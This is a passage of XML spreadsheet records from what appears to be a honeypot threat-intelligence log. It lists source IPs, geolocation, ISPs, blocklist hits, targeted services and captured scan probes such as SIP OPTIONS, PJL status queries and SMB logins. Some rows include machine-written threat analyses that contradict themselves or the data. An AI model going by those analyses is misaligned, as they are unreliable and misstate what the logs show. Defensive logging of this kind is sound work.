    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="MA"/>
    <s v="Morocco"/>
    <s v="01"/>
    <s v="Tanger-Tetouan-Al Hoceima"/>
    <s v="Tanger-Assilah"/>
    <s v="Tangier"/>
    <s v="2530335"/>
    <s v="NA"/>
    <s v="35.7673"/>
    <s v="-5.79975"/>
    <s v="36903"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="business"/>
    <s v="MarocTelecomASDL"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a0b1:f09c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="632"/>
    <x v="632"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T21:42:36"/>
    <d v="2025-04-27T21:42:36"/>
    <d v="2025-04-27T21:42:36"/>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3:d4ae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="633"/>
    <x v="633"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T21:11:46"/>
    <d v="2024-12-31T20:43:44"/>
    <d v="2025-04-27T21:11:46"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Aligarh"/>
    <s v="Jalālī"/>
    <s v="1269441"/>
    <s v="202128"/>
    <s v="27.7996"/>
    <s v="78.2932"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Ltd"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8ba7:a0fa"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="634"/>
    <x v="634"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T21:11:10"/>
    <d v="2023-12-06T13:24:00"/>
    <d v="2025-04-27T21:11:10"/>
    <n v="3066"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;12411&amp;&amp;23&amp;&amp;50499&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London"/>
    <s v="2643741"/>
    <s v="EC3N"/>
    <s v="51.5174"/>
    <s v="-0.0710756"/>
    <s v="5607"/>
    <s v="Sky UK Limited"/>
    <s v="Sky UK Limited"/>
    <s v="residential"/>
    <s v="Sky Broadband"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5add:b84b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="635"/>
    <x v="635"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T21:01:58"/>
    <d v="2025-04-27T21:01:58"/>
    <d v="2025-04-27T21:01:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:9f35"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible unauthorized access attempt via telnet service, possibly reconnaissance or exploit scanning activity detected. The data indicates no specific malicious action, but suggests potential probing or scanning of the system's telnet service. Further analysis is required to determine the intent behind this activity. &amp;&amp; No TELNET activity detected within the monitored services, suggesting that this service may be intact or undetected malicious attempts. This could imply that no attempts were made to access it via TELNET. The lack of attempt may indicate a secure configuration for this particular service."/>
    <m/>
  </r>
  <r>
    <x v="636"/>
    <x v="636"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T20:14:54"/>
    <d v="2025-03-17T03:05:00"/>
    <d v="2025-04-27T20:14:54"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_FTP_HC1"/>
    <s v="5432&amp;&amp;21&amp;&amp;1433&amp;&amp;6667&amp;&amp;23775&amp;&amp;21995&amp;&amp;110&amp;&amp;445&amp;&amp;143"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="B"/>
    <s v="Chittagong"/>
    <s v="Chittagong"/>
    <s v="Chittagong (Double Moorings)"/>
    <s v="1205733"/>
    <s v="NA"/>
    <s v="22.3234"/>
    <s v="91.8117"/>
    <s v="45326"/>
    <s v="Broad Band Telecom Services Ltd"/>
    <s v="Broad Band Telecom Services Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2012-10-24"/>
    <s v="BBTS-BD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.30.116,39500)}&amp;&amp;{Data_IMAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:1e74"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze malicious activity. &amp;&amp; No available log data provided. &amp;&amp; An incoming connection attempt from an unknown IP address to a shared resource. This could be a sign of unauthorized access attempts or potential malware spread through file sharing. It may indicate malicious actors trying to exploit vulnerabilities in the system. &amp;&amp; An unknown computer is attempting to connect to an SMB server from a potentially malicious IP address (103.30.30.116) on an unusual port (39500). This may indicate a scanning or exploitation attempt. The connection is incoming, suggesting the attacker is trying to initiate communication. &amp;&amp; No activity detected for IMAP service, possible sign of attacker attempting to scan or exploit this service without making any connections or sending any commands. _x000a_This could be an initial reconnaissance step by the attacker. _x000a_The lack of any IMAP-related activity suggests a potential evasion tactic by the malicious actor. &amp;&amp; The data suggests an unsuccessful attempt to access IMAP service, potentially indicating a scanning or probing activity for email accounts or services. This could be part of a larger malicious operation to exploit vulnerabilities or gain unauthorized access to user credentials. The attempt was unsuccessful, but it may be indicative of ongoing reconnaissance efforts."/>
    <m/>
  </r>
  <r>
    <x v="637"/>
    <x v="637"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T20:08:38"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-27T20:08:38"/>
    <n v="237"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_RDP_H4&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;25&amp;&amp;3306&amp;&amp;445&amp;&amp;23&amp;&amp;110&amp;&amp;3389&amp;&amp;1433&amp;&amp;5432&amp;&amp;80&amp;&amp;NA&amp;&amp;443&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="188"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=59601'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.143,48486)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.180.55.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 156.244.37.11:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.143,35298)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (PDrpwaRl,)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.234.67.80:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=41652'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=49510'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.143;rport=47396'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d8f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="There is no data provided for analysis. &amp;&amp; Attempt to connect to PostgreSQL service, possibly for malicious database access or unauthorized account creation. The lack of 'NA' indicates this was attempted successfully within the honeypot. This may be indicative of an attacker probing for vulnerabilities."/>
    <m/>
  </r>
  <r>
    <x v="638"/>
    <x v="638"/>
    <s v="h46-236-65-74.cust.bredband2.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T19:16:13"/>
    <d v="2024-12-24T20:27:46"/>
    <d v="2025-04-27T19:16:13"/>
    <n v="115"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="80&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="29518"/>
    <s v="Bredband2 AB"/>
    <s v="Bredband2 AB"/>
    <s v="business"/>
    <s v="Bredband2"/>
    <s v="2010-12-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2002-06-26 16:35:31"/>
    <s v="2025-06-26 16:40:48"/>
    <s v="2024-05-28 06:07:18"/>
    <s v="['LEE.NS.CLOUDFLARE.COM', 'OLGA.NS.CLOUDFLARE.COM']"/>
    <s v="Name SRS AB"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Protected Protected"/>
    <x v="11"/>
    <s v="NA"/>
    <s v="Radiovägen 2"/>
    <s v="::ffff:2eec:414a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity reported for Telnet service, possibly due to lack of connection attempts or no malicious activity detected. _x000a_Telnet service has been idle or unutilized at the time of logging._x000a_ No suspicious activity is associated with this log entry."/>
    <m/>
  </r>
  <r>
    <x v="639"/>
    <x v="639"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T19:06:06"/>
    <d v="2025-04-27T19:06:06"/>
    <d v="2025-04-27T19:06:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="01"/>
    <s v="Riyadh Region"/>
    <s v="NA"/>
    <s v="Riyadh"/>
    <s v="108410"/>
    <s v="NA"/>
    <s v="24.6877"/>
    <s v="46.7219"/>
    <s v="39891"/>
    <s v="ALJAWWALSTC-AS"/>
    <s v="Saudinet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:33fc:8847"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <s v="Possible attempt to log into a website using an automated browser profile likely generated from stolen credentials. The browser type and version are fake, but the Android device information is legitimate, indicating a potential phishing or credential stuffing attack. &amp;&amp; A login attempt is being made using an HTTP request with a suspicious browser fingerprint. The browser information matches Mozilla Firefox's user agent but may be spoofed to evade detection. This could be an automated bot attempting to gain unauthorized access."/>
    <m/>
  </r>
  <r>
    <x v="640"/>
    <x v="640"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T18:50:25"/>
    <d v="2023-08-16T13:50:24"/>
    <d v="2025-04-27T18:50:25"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Brute Force&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="26855&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="46"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SA"/>
    <s v="Saudi Arabia"/>
    <s v="01"/>
    <s v="Riyadh Region"/>
    <s v="NA"/>
    <s v="Riyadh"/>
    <s v="108410"/>
    <s v="NA"/>
    <s v="24.6877"/>
    <s v="46.7219"/>
    <s v="39891"/>
    <s v="Saudi Telecom Company JSC"/>
    <s v="Saudinet"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="1993-09-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:33fc:b578"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="641"/>
    <x v="641"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T18:45:46"/>
    <d v="2025-04-27T18:45:46"/>
    <d v="2025-04-27T18:45:46"/>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d6:4b64"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="642"/>
    <x v="642"/>
    <s v="ec2-18-97-5-39.compute-1.amazonaws.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-27T18:07:34"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T18:07:34"/>
    <n v="122"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Credential Stuffing"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H46&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_POSTGRES_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;61286&amp;&amp;23&amp;&amp;389&amp;&amp;443&amp;&amp;3306&amp;&amp;5432&amp;&amp;1521&amp;&amp;21&amp;&amp;6379&amp;&amp;3389&amp;&amp;25"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-07"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3079.53 Safari/537.32', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
